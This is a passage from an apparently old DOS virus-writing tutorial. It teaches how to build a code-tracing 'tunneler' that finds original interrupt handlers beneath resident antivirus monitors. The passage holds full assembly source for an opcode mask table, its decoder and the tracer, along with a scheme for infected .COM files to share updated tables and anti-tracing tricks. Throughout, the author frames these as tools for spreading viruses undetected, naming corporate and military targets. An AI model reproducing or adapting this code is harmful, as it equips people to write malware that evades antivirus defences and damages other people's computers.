        db 010001000xb, 000000000xb
        db 010001000xb, 001000000xb
        db 000100100xb
        db 010001000xb, 010000000xb
        db 010001000xb, 011000000xb     ; MOV [reg/mem] with register

        db 000000001xb
        db 011111100xb
        db 000000011xb
        db 010100000xb          ; MOV memory with accumulator

        db 000000010xb
        db 011111000xb
        db 000100011xb
        db 010111000xb
        db 010110000xb          ; MOV reg, immediate

        db 000000010xb
        db 011111111xb
        db 000110010xb
        db 010101000xb
        db 010101001xb          ; TEST accumulator, immediate

        db 011000100xb
        db 011000100xb, 011000000xb
        db 000110010xb
        db 000000000xb, 000000000xb
        db 000000000xb, 001000000xb
        db 000100100xb
        db 000000000xb, 010000000xb
        db 000000000xb, 011000000xb     ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR]
                                        ; [reg/mem] with register

        db 011000100xb
        db 011111100xb, 011000000xb
        db 000110010xb
        db 011010000xb, 000000000xb
        db 011010000xb, 001000000xb
        db 000100100xb
        db 011010000xb, 010000000xb
        db 011010000xb, 011000000xb     ; [RCR|RCL|ROR|ROL|SHR|SHL|SAR|SAL]

        db 011000100xb
        db 011110100xb, 011000000xb
        db 000110010xb
        db 010000100xb, 000000000xb
        db 010000100xb, 001000000xb
        db 000100100xb
        db 010000100xb, 010000000xb
        db 010000100xb, 011000000xb     ; XCHG/TEST/LEA/POP
                                        ; [register/memory], [register/memory]
                                        ; MOV [segreg/mem], [segreg/mem]

        db 011000100xb
        db 011111111xb, 011000000xb
        db 001000011xb
        db 010000011xb, 000000000xb
        db 010000011xb, 001000000xb
        db 000110101xb
        db 010000011xb, 010000000xb
        db 010000011xb, 011000000xb     ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR]
                                        ; [reg/mem], immediate (word)
                                        ; <-- WEIRD format

        db 011001000xb
        db 011111101xb, 011000000xb
        db 001000011xb
        db 010000000xb, 000000000xb
        db 010000000xb, 001000000xb
        db 000110101xb
        db 010000000xb, 010000000xb
        db 010000000xb, 011000000xb     ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR]
                                        ; [reg/mem], immediate (byte)
        db 001010100xb
        db 010000001xb, 000000000xb
        db 010000001xb, 001000000xb
        db 001000110xb
        db 010000001xb, 010000000xb
        db 010000001xb, 011000000xb     ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR]
                                        ; [reg/mem], immediate (word)
                                        ; Make sure WEIRD series is handled
                                        ; first

        db 011001000xb
        db 011111111xb, 011000000xb
        db 001000011xb
        db 011000110xb, 000000000xb
        db 011000110xb, 001000000xb
        db 000110101xb
        db 011000110xb, 010000000xb
        db 011000110xb, 011000000xb     ; MOV [reg/mem], immediate (byte)
        db 001010100xb
        db 011000111xb, 000000000xb
        db 011000111xb, 001000000xb
        db 001000110xb
        db 011000111xb, 010000000xb
        db 011000111xb, 011000000xb     ; MOV [reg/mem], immediate (word)

        db 011001000xb
        db 011111111xb, 011111000xb
        db 001000011xb
        db 011110110xb, 000000000xb
        db 011110110xb, 001000000xb
        db 000110101xb
        db 011110110xb, 010000000xb
        db 011110110xb, 011000000xb     ; TEST [reg/mem], immediate (byte)
        db 001010100xb
        db 011110111xb, 000000000xb
        db 011110111xb, 001000000xb
        db 001000110xb
        db 011110111xb, 010000000xb
        db 011110111xb, 011000000xb     ; TEST [reg/mem], immediate (word)

        db 000000010xb
        db 011000111xb
        db 000110010xb
        db 000000100xb
        db 000000101xb          ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR]
                                ; accumulator, immediate

        db 011000100xb
        db 011110110xb, 011000000xb
        db 000110010xb
        db 011110110xb, 000000000xb
        db 011110110xb, 001000000xb
        db 000100100xb
        db 011110110xb, 010000000xb
        db 011110110xb, 011000000xb     ; [CALL|DEC|INC|JMP|PUSH|???] reg/memory
                                        ; [NOT|NEG|MUL|DIV|IMUL|IDIV|???] reg/memory
                                        ; Also handles TEST by accident... so make
                                        ; sure this is *AFTER* TEST cases have been
                                        ; handled else we'll use the wrong formula
instruction_table_end:

─────────────────────────────────────────────────────────────────────────────
 Section 5: Complex mask table decoder
─────────────────────────────────────────────────────────────────────────────

Well, all that was nice and fine. We have our table definition, and we have
our table, except all this is useless if the computer doesn't understand our
table format. As such, we need to start writing a decoder which will accept
an opcode and work out the full length of the instruction by decoding the
table entry fields until it finds a match.

Before we start, let's make a few assumptions. The first assumption is that
we've already handled all the other opcodes we need to, such as any segment
overrides.
Also, we handle all our JMPs/CALLs etc earlier on because they're special instructions and we don't want them intefering with our table. For our little routine, we'll assume our instruction is in AX on entry and that we return the number to add the IP in the AX register. BX will also be cleared to indicate a successfull match. If we don't find a match, however, we set BX=1 and AX=1. entry_ax dw 0 ; AX on entry to table decoding routine cmp_loops db 0 ; number of CMPs left to process need_fixup db 0 ; FIXUP flag table_decoder proc near push cs pop es mov [es:entry_ax], ax lea di, [instruction_table_start] jmp decode_start decode_equal: cmp [es:need_fixup], 0 je no_fixup mov ax, [es:entry_ax] and ah, 011000111xb cmp ah, 0110xb jne no_fixup add dl, 2 no_fixup: mov al, dl cbw xor bx, bx ret decode_error: mov ax, 1 mov bx, 1 ret decode_start: cmp di, offset instruction_table_end je decode_error mov ax, [es:entry_ax] mov bl, [es:di] and bl, 01111xb mov [es:cmp_loops], bl mov cl, [es:di] mov bl, [es:di] and cl, 001000000xb mov [es:need_fixup], cl inc di and bl, 010000000xb jz byte_entry word_entry: mov bx, [es:di] and ax, bx inc di inc di word_do_cmp: mov dl, [es:di] and dl, 01111xb mov bx, [es:di+1] cmp ax, bx je _decode_equal dec [es:cmp_loops] jz word_next_first mov dl, [es:di] mov cl, 4 shr dl, cl mov bx, [es:di+3] cmp ax, bx je _decode_equal add di, 5 dec [es:cmp_loops] jnz word_do_cmp jmp decode_start word_next_first: add di, 3 jmp decode_start _decode_equal: jmp decode_equal byte_entry: mov bl, [es:di] and al, bl inc di byte_do_cmp: mov dl, [es:di] and dl, 01111xb mov bl, [es:di+1] cmp al, bl je _decode_equal dec [es:cmp_loops] jz byte_next_first mov dl, [es:di] mov cl, 4 shr dl, cl mov bl, [es:di+2] cmp al, bl je _decode_equal add di, 3 dec [es:cmp_loops] jnz byte_do_cmp jmp decode_start byte_next_first: inc di inc di jmp decode_start table_decoder endp Our decoder turns out to be 216 bytes long, so, adding up both our decoder and complex mask table sizes we come 
out with just 469 bytes. This may seem a mite large, considering the old method is 1 byte big (just an INC SI), but at least we are safe from MOV instructions and the like, which trip up all of the 'lesser' code tracers. The code I've written is, well, fairly optimized, but I guess if you rewrote it you could squeeze more bytes out. This one shall do for us, however.

The problem with complex tables is that the code size needed to decode them increases with the space saved on the actual table itself: the more space saved, the greater the complexity, and the longer it takes to decode. Making the table more complex and shaving 200 bytes off the table size could easily add 200 bytes to the decoder size, making your effort fruitless, while simplifying the table will grow the table by more than the decoder shrinks.

Alright, so, we have 469 bytes, and we might want to compress this down a bit further. How would we do this? To put it simply, we'd need a complete rewrite with something OTHER than a complex mask table, ie, totally changing the definition to something new and exciting. I have a few ideas for this, and maybe they can get our total size down to 300 bytes or so. Whether it ends up around that margin, above, or below, I'm not sure, as I haven't coded it or tried it out yet. If any of my ideas work out you'll see them in document three, as we need a similar system for handling strange opcodes when you learn about PSP tunneling. But don't hold your breath ;)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Section 6: Algorithms for our code tracing engine
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Well, now we have to talk about algorithms... how exactly our engine is going to work when we write it. Don't just be thinking there's only one main way of doing things...
as there are many ;) The main differences come in how you treat conditional jumps, which opcodes you follow or ignore, and any extra features you include to improve your chances of avoiding crashes.

There are 4 different methods of handling conditional jumps (none of which we'll be using, hehehe). Traditional tracers either ignore them, follow ALL of them, alternate between following one and skipping one, or just randomly choose to follow or ignore each jump as it is encountered.

By being able to toggle between the different methods in your tracer, you can set up a routine that calls the tracer to retrace the interrupt with each methodology, hoping that at least one will work. To put it simply, there is a variable which tells the tracer which type of handling to use for conditional jumps, and it stays constant for the whole of the first trace. Then, the tracer updates this variable to the next tracing method, and runs through the complete tracing pass again, and so on until there are no passes left, or a pass is successful.

This isn't too hard, and is a fairly stable approach to the conditional jump problem. However, it is also a fairly haphazard approach, and although it works extremely well in some cases, it will fail horribly in others. Also, it is very slow, since we have to retrace the entire interrupt chain numerous times, and due to the random type of handling (choosing what to do with each conditional jump as it comes along, one of the 4 methods of conditional jump handling), we could trace through properly one day, but not the next.

Either way, handling conditional jumps is a *BIG* problem for tracers, so we need the *GREATEST* reliability possible, and as such, we will not use any of these methods. No, the method we'll use is far more elegant :)

First of all, we make IRET/RETN/RETF all use the very same RETF code... and CALL/CALLFAR both use the same CALLFAR code.
The reason we save the full DS:SI even for near calls will become apparent later. Anyway, since we always save DS:SI, we can abandon all our different RET code and just have one handler which always pops DS:SI.

On top of this, we set up a counter variable (initialized to 0300H on entry to the engine), which is decremented on each instruction that is traced. Whenever we see a CALL, we save this instruction counter on the stack, and whenever we see a RET, we pop the value back into the instruction counter variable. Now that you know that, you should also know that we will trace conditional jumps just as if they were CALL instructions. Also, as a last resort, we have a global counter variable that we NEVER SAVE. We only ever decrement it, and if it runs out, we know we've been tracing for way too long and we abort the trace.

You should see where this is leading. With a constant number of values pushed on the stack each time (3 words: instruction counter, DS, SI) it is harder to confuse our tracer's stack and screw us over. Also, with a RETF every time our counter runs out, we are able to trace EVERY possible path of execution flow in the interrupt handler, giving us *THE* most reliable tracing method available, while still maintaining the integrity of our counter. The counter is also a good mini-failsafe, so if we trace into the wrong part of memory we won't die.

As you know, when the very first counter variable runs out, the original values we pushed onto the stack in our tracer setup will be popped off, returning our stack to the value it had when we first entered the tracing engine. This triggers the code which stops our stack from starving to death, aborting the trace :)

Okay, so, now we only have one more thing to deal with that you haven't learnt about yet. Take a look at the code shown below (this is taken from... part of the interrupt code in SMARTDRV I think, somewhere along the INT 13 chain).
It is *REAL LIFE* stuff, so, be warned, it's potent :) 185D:0156 8BB73601 MOV SI,[BX+0136] 185D:015A 85F6 TEST SI,SI 185D:015C 740A JZ 0168 185D:015E 3B843801 CMP AX,[SI+0138] 185D:0162 7304 JNB 0168 185D:0164 8BDE MOV BX,SI 185D:0166 EBEE JMP 0156 185D:0168 89BF3601 MOV [BX+0136],DI 185D:016C 89B53601 MOV [DI+0136],SI 185D:0170 C3 RET Okay, so, what's such a big deal about this you ask? Well, it puts our tracer into an infinite loop (that is, until our global instruction counter runs out or the stack runs out and trips our anti-crash code). The answer to our problem is simple. Whenever we save our counter, DS, and SI on the stack, we check to see if the DS:SI is already ON the stack, and if it is, we simply don't follow the call/conditional jump, skipping it instead. So, now you know how we're going to handle CALL/IRET/conditional jumps, and you also know about all the anti-crash code we're going to include, and since you already know about all the other opcodes we have to deal with, and everything you'll ever need to know about coding the tracer, it's time to actually go ahead and write it! 
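Before the listing, the bookkeeping just described (one saved entry per CALL or conditional jump, a per-path counter, a global counter, and the "already on the stack" check) can be modelled in a few lines of Python. This is only a sketch under loud assumptions: the toy `program` dictionary, its one-slot "instructions", the `trace` function and its result strings are all invented for illustration and are not part of the engine. Real code has variable-length opcodes and segment:offset addresses, none of which is modelled here.

```python
# Toy model only. Every "instruction" occupies one address slot and is a
# (kind, dest) pair; kind is one of "op", "jmp", "jcc", "call", "ret".
# All names here are hypothetical and exist only for this illustration.

def trace(program, entry, target, path_budget=0x300, global_budget=5000):
    saved = []                      # stack of (resume_address, saved_budget)
    pc, budget, total = entry, path_budget, 0
    while True:
        if pc == target:
            return ("found", pc)
        total += 1
        if total > global_budget:   # last-resort counter, never saved
            return ("global_budget", pc)
        budget -= 1
        # Addresses missing from the toy program are treated like a RET.
        kind, dest = program.get(pc, ("ret", None))
        if budget <= 0 or kind == "ret":
            if not saved:           # nothing left to resume: give up
                return ("exhausted", pc)
            pc, budget = saved.pop()
            continue
        if kind == "jmp":
            pc = dest
        elif kind in ("call", "jcc"):
            resume = pc + 1
            if any(addr == resume for addr, _ in saved):
                pc = resume         # already pending: skip this branch
            else:
                saved.append((resume, budget))
                pc = dest
        else:
            pc += 1                 # ordinary instruction: step over it


# A branch whose target jumps straight back to it: the second visit is
# skipped because the resume address is still saved.
loop = {0: ("jcc", 3), 1: ("op", None), 2: ("jmp", 9), 3: ("jmp", 0)}
print(trace(loop, entry=0, target=9))
```

The model treats "jcc" exactly like "call", mirroring the idea in the text; note that the check only fires while the matching entry is still saved.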
These are the return codes: BL=0 DS:SI holds original interrupt entrypoint BL=1 DS:SI holds the instruction which completed our trace through the interrupt chain (not an error) BL=2 DS:SI holds last instruction executed before global counter ran out BL=3 DS:SI holds last CALL which caused our stack to overflow stack_top dw 0 ; do not POP past this point stack_bottom dw 0 ; do not PUSH past this point override db 02eh ; segment overrides variable loop_counter dw 0300h ; how many instructions (loops) we've processed first_mcb dw 0 ; abort when our segment is below this value (INT 21) temp_ip dw 0 ; temporary storage for stack searching temp_store dw 0, 0 ; temporary storage for stack searching global dw 0 ; global abort counter scan_setup: mov [cs:stack_top], sp mov ax, cs mov bx, ss cmp ax, bx je stack_fixup mov ax, 020h jmp stack_setup stack_fixup: lea ax, [offset program_end] add ax, 020h stack_setup: mov [cs:stack_bottom], ax mov [cs:loop_counter], 0300h mov ah, 052h int 021h mov ax, [es:bx-2] mov [cs:first_mcb], ax mov ax, 03521h int 021h push es pop ds xchg bx, si xor ax, ax push ax push ax push ax scan_begin: mov [cs:override], 02eh mov ax, ds cmp ax, [cs:first_mcb] jae scan_prefix mov bl, 0 mov sp, [cs:stack_top] ret scan_prefix: dec [cs:loop_counter] jz do_ret_far dec [cs:global] jz global_error cmp si, 0fffah jae do_ret_far mov ax, [si] push ax and al, 011100111xb cmp al, 000100110xb ; check for segment overrides pop ax je prefix_found push ax and al, 011110000xb cmp al, 001110000xb ; check for conditional jump series pop ax jne scan_ret_opcode do_conditional_jump: mov ax, si inc ax inc ax call call_finish jmp do_jump_short prefix_found: mov [cs:override], al inc si jnc scan_prefix jmp do_ret_far global_error: mov bl, 2 mov sp, [cs:stack_top] ret scan_ret_opcode: cmp al, 0cfh je do_ret_far ; check for IRET push ax and al, 011110110xb cmp al, 011000010xb ; check for RET[N|F] pop ax jne scan_flow_opcodes do_ret_far: mov ax, sp add ax, 6 cmp ax, [cs:stack_top] 
jae scan_root_exit pop si pop ds pop [cs:loop_counter] jmp scan_begin scan_root_exit: mov bl, 1 mov sp, [cs:stack_top] ret do_jump_short: mov al, [si+1] cbw add si, ax inc si inc si jmp scan_begin do_jump_near_immed: add si, [si+1] add si, 3 jmp scan_begin do_jump_far_immed: mov ax, [si+3] mov si, [si+1] mov ds, ax jmp scan_begin do_jump_near_mem: cmp [cs:override], 02eh jne do_ret_far mov si, [si+2] mov si, [si] jmp scan_begin do_jump_far_mem: cmp [cs:override], 02eh jne do_ret_far mov si, [si+2] mov ax, [si+2] mov si, [si] mov ds, ax jmp scan_begin scan_flow_opcodes: cmp al, 0ebh je do_jump_short cmp al, 0e9h je do_jump_near_immed cmp al, 0eah je do_jump_far_immed cmp al, 0ffh jne scan_flow_opcodes_next push ax and ah, 0110000xb cmp ah, 0100000xb pop ax jne scan_flow_opcodes_next push ax and ah, 011000111xb cmp ah, 000000110xb pop ax jne _do_ret_far ; weird JMP/CALLs we can't handle (which use ; registers, weird offset bytes, etc, etc, etc) cmp ah, 026h je do_jump_near_mem cmp ah, 02eh je do_jump_far_mem cmp ah, 016h je do_call_near_mem cmp ah, 01eh je do_call_far_mem scan_flow_opcodes_next: cmp al, 0e8h je do_call_near_immed cmp al, 09ah je do_call_far_immed scan_unknown_opcodes: call table_decoder cmp bx, 0 jne _do_ret_far add si, ax jc _do_ret_far jmp scan_begin _do_ret_far: jmp do_ret_far do_call_near_mem: call call_setup add ax, 4 jc _do_ret_far call call_finish jmp do_jump_near_mem do_call_near_immed: call call_setup add ax, 3 jc _do_ret_far call call_finish jmp do_jump_near_immed do_call_far_immed: call call_setup add ax, 5 jc _do_ret_far call call_finish jmp do_jump_far_immed do_call_far_mem: call call_setup add ax, 4 jc _do_ret_far call call_finish jmp do_jump_far_mem call_setup: pop bx mov ax, sp sub ax, 6 cmp ax, [cs:stack_bottom] jbe _stack_error mov ax, si push bx ret _stack_error: mov bl, 3 mov sp, [cs:stack_top] ret call_finish: pop [cs:temp_ip] mov [cs:temp_store], ax mov [cs:temp_store+2], ds push ss pop ds xchg si, bp mov si, sp mov bx, si 
call_loop: lodsw cmp ax, [cs:temp_store] jne call_nomatch lodsw cmp ax, [cs:temp_store+2] je call_match_found call_nomatch: add bx, 6 mov si, bx cmp si, [cs:stack_top] jb call_loop call_exit: push [cs:loop_counter] mov ax, [cs:temp_store+2] push ax push [cs:temp_store] push [cs:temp_ip] xchg bp, si mov ds, ax ret call_match_found: mov si, [cs:temp_store] mov ax, [cs:temp_store+2] mov ds, ax jmp scan_begin program_end: Yay! We turned out to be 528 bytes long (with optimisations... this could become quite a bit smaller). With the added size of the decoder and complex mask table, we turn out to be 997 bytes long! We fit into 1k, which was my secret goal for the whole document :) Of course, with optimizations I'm sure you could get this down to at least 700 bytes small. And how well do we work? Well, so far, with all my tests, this has tunneled INT 21 properly under ANY working combination of QEMM/SoftIce (2.8, dos version)/HIMEM/EMM386/TBAV resident software/F-PROT's VIRSTOP, as well as my own anti-single-step-tunneler TSR code (hehehe, you can't be too carefull). Strangely enough, it won't tunnel past VSHIELD by mcafee, only the lamest crappiest most sickening AV product on the planet!!!! SHRIEK! However, with INT 13 tunneling, we run into serious problems. Under DESQView (with or without anything else loaded), our global counter runs out... under DESQView+QEMM+SMARTDRV, we get a return value but it won't work properly. Under plain DOS, with nothing loaded, we will tunnel okay, and the same if we run just QEMM or EMM386, -UNLESS- 'SMARTDRV' is loaded, in which case we will never tunnel properly. To make things even stranger, some people are telling me that this tracer is giving them completely different results than what I've said! For instance, they say it tunnels both i13 and i21 correctly... some say it tunnels i13 correctly but not i21... etc etc. Why is this so? Well, to put it simply, I have no idea ;) I think the tracer itself has some inbuilt bugs... 
especially with the recursion... but... I have not been able to track anything down :(

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Section 7: Additional notes on CMT's
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

This section is about notes on CMT's... problems you need to take into consideration and also IDEAS about how you can use them. No code is included in this section, as it's all theory; you can develop your own code. Hey, your mommy may hold your pee-pee when you go to the toilet but that way you'll never learn how to hold your pee-pee for yourself... I'm throwing you into shark infested waters so you can learn how to swim, or die ;) Just don't piss everywhere, okay?

Okay, well, first things first, complex mask tables aren't perfect, and they are actually quite dangerous to our tracer if used incorrectly. Your tracer is only as good as its complex mask table. If your complex mask table misses even *ONE* instruction, then your WHOLE trace will be totally stuffed up. The reason is that after you skip the first opcode (because of the error returned by the decoder), the decoder is handed whatever bytes come NEXT, and it returns a length for them, such as 4, thinking they are a proper instruction. The trace then continues on its misaligned path. You can see how this destroys our trace, even more so than if we ditched CMT's and used INC SI.

The tracer above, however, uses the error codes from the decoder to decide what to do. If an unknown instruction is found, then we skip this path and try the last saved DS:SI value on the stack. This is better than following through on our dangerous course. However, if EVERY path of execution goes through this bit of code, we might have been better off tracing through and ignoring the error. Maybe a more stable method would be to trace up to the next 'important instruction' using the INC SI method, and then turn the decoder back on.
Of course, then we could be fooled using a MOV instruction ;) Both ways are flawed and there is nothing you can do about it except try to include as much into your mask table as possible. For instance, my mask table needs addition of 186+ instructions, as well as any 8088 instructions I may have missed (hopefully not many... but I bet there's just one or two, I'm not perfect yaknow). Also, in TBAV and many other AV products, 386+ only code is becoming more common, which may cause problems for our CMT. However, luckily, due to the cruddy way the TBAV drivers load up in memory, our tracer tunnels through them before it reaches these 386 opcodes ;) This could change in upcoming versions of TBAV, however. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Evolution and CMT's ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ This is a little off-topic, since this is a document on tunneling, not evolution code, but, either way, since I gave you the CMT (complex mask table), I should give you some more hints on helping it work for YOU! Heck, they're bloody big, you might as well get the most you can out of them, and so, I created this mini-section ;) It's easy to include evolutionary code in your virus ;) Imagine that all your viruses use complex mask tables for one reason or another, and each time you write a virus you include a more up to date, smaller, faster, etc, complex mask table. Now, in every virus you write, you set it up so that in each file you infect, the .COM files have the initial instructions like: .COM file: org 0100h jmp VIRUS_BEGIN ; bootstrap virus code db 'CMT' ; marker dw (delta_offset+offset CMT_HEADER) ... rest of .COM file ... VIRUS_BEGIN: ... VIRUS ... 
If you were infecting EXE's too, you could save the offset of the CMT in the file at a specific byte somewhere, or store the information in the header, etc, wherever suits you best, but for simplicity, I'll only give examples for .COM ;) Anyway, you should see a good idea solidifying here ;) For each virus you write, it uses a different version of complex mask table. Every virus you write, also has the ability to grab the offset in a file of that complex mask table by looking at the word value after the 'CMT' marker. Then, it can index the header to the CMT which looks like this: CMT_HEADER: VERSION: dw 0 LENGTH: dw (offset instruction_table_end-offset instruction_table_start) instruction_table_start: ... CMT goes here ... instruction_table_end: VERSION could simply be a number, such as if you're incrementing it each time you add... else it could be different and set out into bitfields... ie: 386+ opcodes, size optimized, speed optimized, (revision byte), etc. After this, inside your virus, you can include code to scan other files as it infects them for the marker of another variant of your virus, and make decisions about wether it should upgrade its complex mask table to the new version. For instance, if running on an XT computer with version 1 of a 386+ mask table, it might find a variant running with an 8088+ speed/size optimized version... so it upgrades ;) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 8: Flaws in code tracing ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Code tracers have never been too popular, mostly because of the flaws in the actual design of the code tracer itself in not being able to follow through all types of execution flow, and as such, you'd be hard pressed to find any decent virus using code tracing in the form I have shown you here. However, code tracing does have OTHER uses, a few of which you'll learn about in the next document in this series. 
Until then, it's time to delve into how certain code constructs can fool tracers.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Anti-tracing with opcodes ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

The number one way to beat a tracer is to throw unusual opcodes into the code you suspect will be traced. To beat the simpler tracers, all that is needed is a MOV instruction with the right values after it, such as MOV AL, 0E9H! However, since tracers should now be coming out with proper opcode identification schemes such as complex mask tables, such a code fragment will probably not suffice. This is where 286+, 386+, and co-processor instructions can help out. For example, the currently supplied complex mask table, while (hopefully) handling the simpler co-processor instructions, will choke on a simple MOV EAX, 0E9H!

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Dealing with anti-tracer opcodes ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Anti-tracing via strange opcodes isn't very likely, and won't always work anyway. By adding in instructions which will only work on a specific series of processor, AV products cut various users out of their potential customer market, not that they'd use such a nonsensical section of anti-tracer code in the first place. Also, it wouldn't be too hard to upgrade the complex mask table to handle 386+ instructions and the like, and the same should be true for other opcode identification schemes.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Anti-tracing with conditional jumps ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

An easy way to fool normal tracers would be a simple section of code like that shown below. This takes advantage of the flaw in tracers that prevents them from actually knowing which conditional jumps to take. Only the simplest of tracers would be caught by THIS check... and our tracer will definitely bypass it. However, long series of conditional jumps pose a very real threat to tracers which don't take appropriate precautions.
clc jc scanners_here stc jc scanners_not_here scanners_left_here: ... scanners_not_here: ... ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Dealing with conditional jumps ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ You don't really need to worry about conditional jumps, as the tracer I showed you how to write in the last section deals with them easily. Even never-ending conditional jumps are no threat to our tracer, as it has been built to handle all conditional jump conditions with the most robust error checking system I could think of. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Anti-tracing with spaghetti code ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The number one way to beat code tracing is simply using confusing code. For example, hiding bits of code in interrupt handlers, using interrupts to get work done, calling previous interrupt handlers in strange ways, messing with a code tracer's stack, etc, will all work. Even using null registers in CALL instructions and modifying code on the fly will work well. There is no defense against complex code. Here are a few examples: lea ax, [go_here] jmp ax ; Using a register for a jump, scanners chuck go_here: lea ax, [go_here_next] mov [cs:go_here_data], ax jmp [cs:go_here_data] ; Flow modification on the fly go_here_data dw 0 go_here_next: mov [cs:go_here_data], 0 ; Cover our tracks ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Anti-tracing with stack manipulation ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Stack manipulation is also a way to fool tracers. For example, we save the IP or CS:IP of our destination on the stack, and issue a RETN/RETF :) This is generally bad news for scanners that will become confused by the RETN/RETF. There is no real solve for this, however, the problem could be slightly alleviated by some code I'll give you in document 3 ;) mov ax, offset i_wanna_go_here push ax ret jmp far 0:0 ; Just in case we're dealing with a stupid scanner ; like Khontarks which doesn't recognize the RET i_wanna_go_here: ... 
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Section 9: How useful are code tracers?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Code tracers are of varying usefulness. Before you start coding one of your own for use in your viruses, you have to compare its good and bad points against the other tunneling technology you have already learnt about, single step tunneling. Single step tunnelers are small, reliable, but detectable. Code tracing on the other hand is large, unreliable, and undetectable. The size however, depends on how much reliability you want, as you can just totally ditch my complex mask table definitions and decrease the total codesize to something close to the size of a decent single step handler by adding in the 'INC SI' instruction.

This still hasn't answered your question right? Well, here's something for you to think about. Where are you planning for your virus to spread? If it's going to be just crappy home computers, what do you think is the percentage of them running software able to detect single step tunnelers? I heard the percentage is VERY small, as most people depend upon SHIT AV software such as SCAN by mcafee and NAV by symantec. This means, the instances of you being caught are far outweighed by the extra computers you are going to infect using original interrupt entrypoints.

However, say you're infecting a more 'up-market' computer system, such as a large networked company. This company may be your only target, or one of the main ones, and ANY detection of your virus on the system would TOTALLY screw over your plans. In an instance such as this, you'd use a code tracer, since not being detected is a VERY high priority.

Then again, if this place you were tunneling was *VERY* high security, such as REALLY big badass corporations or military bases, etc (hehehe), then you'll be wanting BOTH *HIGH reliability* and undetectability of your tunneler.
